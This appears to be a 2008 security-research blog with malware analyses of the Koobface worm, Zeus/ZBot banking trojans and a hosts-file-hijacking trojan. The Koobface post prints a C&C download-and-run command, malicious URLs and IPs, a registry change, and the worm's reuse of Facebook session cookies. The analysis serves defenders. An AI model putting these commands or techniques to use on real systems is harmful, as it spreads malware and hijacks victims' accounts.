Wednesday, December 17, 2008

How to Defeat Koobface


As published in the previous blog post, analysis of the current version of Koobface uncovered a very interesting part about it – its "ability" to resolve CAPTCHA protection at the Facebook web site. To put it simply, if Koobface was unable to resolve Facebook’s CAPTCHA protection, it would’ve been unable replicating because in order to submit a new message, one needs to resolve CAPTCHA image first.

Every time Koobface runs into CAPTCHA protection at Facebook, it transfers that image to its command-and-control server. From there, the image is relayed to an army of CAPTCHA resolvers, who work day and night ready to pick up a new image from their profile, solve it, submit an answer, and get paid something like 0.5 cent for the answer.

You wonder if it's financially sustainable?

Think about it this way: according to the World Bank, at least 80% of humanity lives on less than $10 a day. In the same time, web resources like this one, give its users an opportunity to make that kind of money ($9) in three hours by resolving CAPTCHA images relayed to them. Don’t you think the potential army of CAPTCHA resolvers has all the reasons to grow?

Detailed analysis of traffic between Koobface and its command-and-control server allowed tapping into its communication channel and injecting various CAPTCHA images in it to assess response time and accuracy. The results are astonishing – the remote site resolved them all.

But here is a twist: uploading a large number of random CAPTCHA images into its communication channel will load its processing capacity, potentially up to a denial-of-service point. Well, if not that far, then at least it could potentially harm its business model, considering that the cost of resolving all those injected images would eventually be paid by the Koobface gang.

The tapping mechanism is best illustrated with the following scheme:



There was a tool specifically built to upload CAPTCHA images to the Kobface C&C server and receive the responses. It is available for download here (the ZIP file contains a few test images to upload).

The tool opens up an interesting "dialog" with the back-end operators, a dialog with some interesting discoveries.

At first, the response clearly looks like it was produced by automation:



As seen in this example, the automation tried to OCR the image (which contains a very specific Russian word) – it’s very unlikely that a human would have provided such answer.

Trying to submit it images with the provocative phrases had no luck either – the remote server resolves them vigorously – as if it was a bot, or maybe a smart operator instructed to reply as if he or she was a bot:



But given that no automation can presumably handle really complex images – images that are difficult even for humans to resolve, let’s try to submit with the tool the more complex ones. Here are the results:



As seen on the picture, all Facebook’s CAPTCHAs were resolved pretty well.

But here are a couple of bloopers – these images were resubmitted because the original answers were totally wrong:



Let’s see how it withstands Google’s CAPTCHAs. Here is another blooper revealed:



The wrong answers like "edtgted rghf", "edrfb dfbn", "dfgd dfg", and "asdf df" mean it was not an automation. Otherwise, it would have tried to resolve the images at least partially, or maybe provided nonsense for the noise detected in the picture or any other answer suggesting it was a bot. In the end, the wrong answers would have been at least consistent across several attempts.

These wrong answers simply mean someone was hitting the keyboard (check these keys location), giving those pictures up as too complex puzzles that require too much time/attention, in order to proceed to the easier ones.

These results could mean that the back-end CAPTCHA server has a queue of CAPTCHA images to resolve, and in front of that queue there must be an automation that firstly tries to resolve CAPTCHAs automatically, by using optic image recognition techniques. If the automation fails, it then passes the image down into the queue to be further distributed and picked up by an operator to be processed manually. Such relaying obviously has no method to oppose, as it destroys the very meaning of CAPTCHA – to distinguish a bot from a human. By having them eventually processed by humans, the only reason to keep CAPTCHA protection is to make the resolving process as expensive as 0.5 cent per image.

The question is: is it expensive enough to be justified at all? Probably, it’s expensive enough for the kids who build malware out of curiosity or self-determination (compare it with a trivial latch on your window). But it’s nothing for those guys who build malware for any kind of profit (case with Koobface) as more than likely they can afford 0.5 cent per image.

Taking the C&C down? Maybe, but it will rather pop up in a different place the very next day.

A different way of destroying it is via poisoning its traffic with the fake CAPTCHAs that look exactly as the ones that are passed by a valid Koobface worm. In this case, Koobface authors will be paying for every fake CAPTCHA resolved, the ones generated in the lab, not the real-wild-world ones.

Destroying it financially could be a better option in the end.

Friday, December 12, 2008

Zeus Config Decryptor


The banking trojan Zbot (aka WSNPOEM/Zeus/PRG) is still circulating "in-the-wild" in various modifications.

If you are tracking Zbot submissions at ThreatExpert web site, you might find useful the following tool that decrypts the contents of the configuration files downloaded by this trojan: DecodeZeusConfig.zip.

The decrypted config file will normally contain URLs of additional components it downloads along with the URLs of online banking services that it attacks and bogus HTML fields it attempts to inject into online banking login forms.

For example, analysis of the Zeus config file contents over the last week reveals the targeted URLs of the following online financial services:

  • Alfa Bank (Russia)

  • Ameriprise Financial Services (US)

  • Banca March (Spain)

  • Bancaja (Spain)

  • Banco Pastor (Spain)

  • Banco Popular (Spain)

  • Banco Santander, S.A. (Spain)

  • BANESNET S.A. (Spain)

  • Banesto (Spain)

  • Bank of America (US)

  • Barclays Bank (UK)

  • Barclays Bank, S.A. (Spain)

  • Cahoot/Abbey National (UK)

  • Caixa Tarragona (Spain)

  • Caixanova (Spain)

  • Caja Espana (Spain)

  • Caja Extremadura (Spain)

  • Caja Madrid (Spain)

  • Caja Madrid Empresas (Spain)

  • Caja Rural (Spain)

  • Caja Segovia (Spain)

  • Cajamurcia (Spain)

  • Cajasol (Spain)

  • CajaSur (Spain)

  • Citibank (US)

  • Citibank Deutschland Gruppe (Germany)

  • Citizens Bank (US)

  • Clydesdale Bank (UK)

  • comdirect bank AG (Germany)

  • Dresdner Bank (Germany)

  • e-gold (US)

  • ePassporte (Netherlands)

  • E-port.Ru (Russia)

  • Fibanc-Mediolanum (Spain)

  • FIDUCIA IT AG (Germany)

  • Fifth Third Bank (US)

  • Halifax/Bank of Scotland (UK)

  • HSBC Bank (UK)

  • JPMorgan Chase & Co. (US)

  • KeyCorp (US)

  • Kutxa, Caja Gipuzkoa San Sebastian (Spain)

  • La Caja de Canarias (Spain)

  • Lloyds TSB (UK)

  • MDM Bank (Russia)

  • MoneyMail.Ru (Russia)

  • National City Bank (US)

  • norisbank GmbH (Germany)

  • PayPal, Inc. (US)

  • RBK Money (Russia)

  • SunTrust Bank (US)

  • TD Group Financial Services (Canada)

  • U.S. Bank (US)

  • Unicaja (Spain)

  • Volksbank Rhein-Wupper eG (Germany)

  • VR-NetWorld eBanking (Germany)

  • Wachovia Securities (US)

  • Washington Mutual, Inc. (US)

  • Wells Fargo Bank (US)

  • Westpac Banking Corporation (Australia)

  • Yorkshire Bank (UK)

Thursday, December 11, 2008

Intervalhehehe


According to multiple forum posts, there are a number of people who seem to be infected with a mysterious virus that pops up every 10 minutes or so and displays a message "Intervalhehehe".

This threat is most likely distributed as a cracked version of the popular software WinRAR. Its file is a WinRAR self-extractor (report here) that unpacks and runs WinRAR installer itself, plus a file named explore.exe, which is a trojan horse.


The trojan modifies hosts file to redirect users from google.com, yahoo.com and other legitimate sites into the websites hosted at 61.157.217.210, 123.251.143.110, and 123.16.197.121 and being used to distribute rogue antivirus and antispyware solutions:


This trojan is a Visual Basic program built on a Chinese system.

In some way (mostly in its annoyance, of course) it reminds an old DOS-era virus "Skaji Bebe - Fig Tebe".

Tuesday, December 9, 2008

Koobface Leaves Victims the Black Spot


Koobface worm has already been described enough, but a few details about its functionality can still be interesting to the reader. This post is an attempt to crack it to the bottom.


TECHNICAL SUMMARY

Koobface starts from checking if its own file name is %windows%\bolivar[number].exe, where [number] is a decimal number that depends on the build of the worm.

If its file name is not %windows%\bolivar[number].exe, it will copy itself under that name, run that file, drop a temporary batch file (e.g. c:\653ad216543.bat) with the commands to delete its own executable (it can't delete itself while it's running), and quit.

When it runs as %windows%\bolivar[number].exe, it will create the mutex object "4334dfgdfgdf5" in order to make sure that there is only one instance of Koobface running on the system.

It then returns the handle to the foreground window (the window with which the user is currently working) and check if that window is Internet Explorer. If that's the case, it will create an object that will be an invisible instance of Internet Explorer. It will then use that object to navigate across Facebook site and parse its contents.

The worm drops and runs file c:\1.reg in order to create the values:

CLSID"="{25336920-03F9-11cf-8FD0-00AA00686F13}
Extension"=".xml
Encoding"=hex:08,00,00,00

in the registry key:

HKEY_CLASSES_ROOT\Mime\Database\Content Type\application/xhtml+xml

These registry modifications will force Internet Explorer to display application/xhtml+xml MIME type pages without a download prompt.

Koobface retrieves the default system directory for storing cookies by querying the value "Cookies" from the registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Next, it enumerates all cookies looking for the ones created by facebook.com, myspace.com, and bebo.com websites.

Koobface then makes a DNS query to find out what IP address corresponds to the name y171108.com. For different variants this domain name is different, but its format appears to be constant: [letter][date].com, e.g. a22092008.com, f071108.com, z13092008.com.

The name server replies the DNS request with an IP 58.241.255.37:



This IP address is the command and control (C&C) server for Koobface - it accepts data that Koobface collects on a compromised host and replies back instructions of what Koobface should do.

The collected data is delivered by Koobface in the POST request submitted to /fb/first.php resource of C&C server. The POST string is assembled from the parameters - like these:

f=0&a=13441600&v=28&c=0&s=fb&l=&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=0&c_yb=0


For example, "ck" parameter is equal to "0" if Koobface could not find facebook.com cookie, or "1" if the cookie was found.


BACKDOOR COMMANDS

The C&C returns back instructions that may depend on the data that Koobface delivers to the C&C server - these can be considered backdoor commands which also makes Koobface a backdoor trojan.

Some of the commands that Koobface can be instructed to perform are listed below:

  • FBTARGETPERPOST

  • TINYURL

  • SHARELINK

  • MPOST

  • INVITE

  • PARAMS

  • SWFMODE

  • UPDATE

  • RESET

  • WAIT

  • START

  • STARTIMG

  • DOMAIN_B

  • TITLE_B

  • TEXT_B

  • LINKTEXT_B

  • DOMAIN_M

  • TITLE_M

  • TEXT_M

  • LINKTEXT_M

  • LINK_M

  • DOMAIN_C

  • TEXT_C

  • LINKTEXT_C

  • STARTONCEIMG

  • EXIT

Those commands that require parameters will have them appended and delimited with the "|" character. For example, C&C may return these commands:

START|http://www.teamtga.com/images/games/gif/tinyproxy23.exe
RESET
FBTARGETPERPOST|20
#BLACKLABEL

The first command is START - Koobface will perform it this way:

  • it will create a temporary file c:\tmark25[random_number].dat

  • it will then download an executable file from the specified URL saving it as the temporary file

  • it will then copy that file as %temp%\tt_[random_number].exe, then run it


The aforementioned executable will be downloaded either from www.teamtga.com or from www.gameland.ro - according to the parameter returned at the time of this writing. A couple of days ago this was www.aibcvienna.org. A few hours from now it could be a different URL.

The C&C must have an updatable database of compromised web servers from which the Koobface client will be instructed to download and run executables. Once one compromised site is cleaned or taken down, the C&C database will be updated to feed a different URL to its clients.

On RESET command, Koobface will delete the temporary files and re-start its workflow.

On STARTIMG command, it will download a file from the specified URL, save it as c:\tmark25[random_number].dat, decrypt it, parse the decrypted contents, locate URL inside it, then download an executable from that URL, save it as %temp%\tt_[random_number].exe, and finally run that executable.

On UPDATE command, the worm will download an updated build from the specified URL, save it as %temp%\tt_[random_number].exe, run it and quit.

On EXIT, it will simply quit.

Other commands may specify additional global parameters or modes.


REPLICATION

Before it continues, Koobface makes a final query to its C&C server's resource achcheck.php.

If the server responds ACH_OK, the worm goes ahead.

The user-agent string that identifies the client browser is set by Koobface to:
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20040201 Firefox/3.0.3


The user-agent language tag, that indicates the language for which the client had been localized, is "ru": Russian.

This explains #BLACKLABEL token returned by the C&C server - it's the result of translation of The Black Spot term (from the novel Treasure Island by Robert Louis Stevenson) into Russian, and then back into English.

Once the victim is "given the Black Spot", Koobface locates the cookie left by facebook.com in the cookie cache, then reads it and uses its contents to connect to Facebook website.

For example, if the cookie's contents starts from:
datr
1228869768-5ed159061fd5727f027e6c6678531c19ef53163bfe7ebcbb0203b
facebook.com/
9216
832238592
...


then the GET request submitted by Koobface will look like shown below (check the "datr" value - it is taken from the cookie):



This allows Koobface to connect to Facebook account by using current user's login session. Thus, it does not need to know user's login credentials. As long as the user stays connected to the Facebook account, the worm freely accesses it as if it was the user.

Once connected, the worm opens up several Facebook resources such as home.php, profile.php, group.php. It navigates to the page http://www.facebook.com/friends/?view=everyone in order to obtain the list of the user's friends.

If it locates a friend, it submits a POST request to its C&C server's resource /fb/gen.php. The POST request contains details similar to the ones below:

f=0&a=13441600&v=28&c=0&s=fb&l=&hav=&hname=[encrypted_string]

The C&C server responds the following parameters:

TITLE_M|Cool nice video with you.
TEXT_M|LOL
LINK_M|http://geocities.com/carlosbecker54/?4bchce6c9a=1851a448d70904485af377d941bca0f4


These parameters is a template for a new message that Koobface should send to the contacts. It then navigates to the page /inbox/?compose within Facebook website, composes a new message and submits it from the user's name:



Before the message is dispatched, Facebook returns CAPTCHA challenge to resolve. This security measure is implemented to protect users from threats like Koobface.

In the real test, Facebook.com asked the Koobface to resolve the CAPTCHA image that reads "suffer accorn" - this image was pretty noisy for image recognition algorithms to resolve it successfully. But Koobface does not attempt to resolve it by itself. It submits this image to its C&C server. The server replies correct answer in about 34 seconds. Once the answer is received, Koobface submits the message via Facebook's compromised account including correct CAPTCHA answer:




PUTTING IT TO A REAL TEST

In order to test Koobface replication in action, there were 2 fake accounts created: "Eno Koob Acef" and "Owt Koob Acef" ("Face Book One" and "Face Book Two" reversed). Both accounts were mutually declared as friends.

If the computer logged on to the second account is compromised with Koobface, the worm will use its login session, it will locate "Eno Koob Acef" as its friend, and it will send it a message.

The image below shows the inbox of the first account ("Eno Koob Acef") - it contains a new message from the 2nd account ("Owt Koob Acef") with the subject "Cool nice video with you."



When the user clicks the new message link, Facebook.com will open that message:



The message contains a URL that points to a private page hosted at geocities.com web site. When that link is clicked, the browser will redirect the message recipient to the following page:



The page has a header "Secret video by [infected_user_name] - Flash Player Installation". It even has fake testimonials. The page suggests installing a newer version of Flash Player, which of course is not a Flash Player. It's a file called flash_update.exe, and it's a new copy of Koobface. If the Facebook user runs it thinking it's a Flash Player update, the worm will now replicate to this user's friends the same manner it did before, and so on, and so on.


CONCLUSION

At one point of its execution, Koobface submitted GET request to facebook.com:
/campaign/impression.php?campaign_id=[long_number]

The purpose of this request is not quite clear. It might potentially be related to some advertising program within Facebook (e.g. similar to Google AdSense), but this is a guess...

Nevertheless, if it's about the money generated by clicking ads by Koobface, the ads that are allocated by Facebook within other peoples' profiles, then its business model becomes more evident. It may even potentially include manual labor in breaking the CAPTCHAs (it's not free) - at least it explains a 34 seconds inter-server delay in solving it.

Monday, December 8, 2008

Escort Agency Serves Naughty Trojan


ThreatFire team has busted another "in-the-wild" ZBot trojan.

Interesting detail this time is that the trojan is currently hosted at the server with the IP 92.48.71.14 - this is a web server of "London Escorts & Escort Agencies" and its domain name is escortcitylondon.com.

When run, the trojan downloads an encrypted configuration file from 193.27.246.190. The config file instructs the bot to update itself right from the escort site mentioned above.

The trojan attempts to deactivate a number of AV products and firewalls by deleting their registry keys, terminating the processes and modifying the hosts file.

ZBot attempts to steal the contents of online banking forms of the following banks:

  • Bank of America

  • CheBanca!

  • Banca Mediolanum


The targeted banking sites can be seen in its memory contents:




Full ThreatExpert report is available here.

Wednesday, December 3, 2008

Beware Christmas Promotions From Coca Cola

A new mass-mailing worm is making its rounds by promoting a Hallmark e-Card, McDonald’s Coupon, or Coca Cola Christmas Promotion.

Full worm description (manual analysis) is provided here.

Automated threat analysis generated this write-up.

ThreatExpert automation tricked this threat with several intentionally implanted fake email contacts (such as Rusty Carr, Easton West, Justin Case and others). As soon as this threat picked up one of those contacts and attempted to submit an email to that person via the ThreatExpert’s emulated network services (with no traffic ever leaving the sandbox), it was immediately classified as mass-mailer.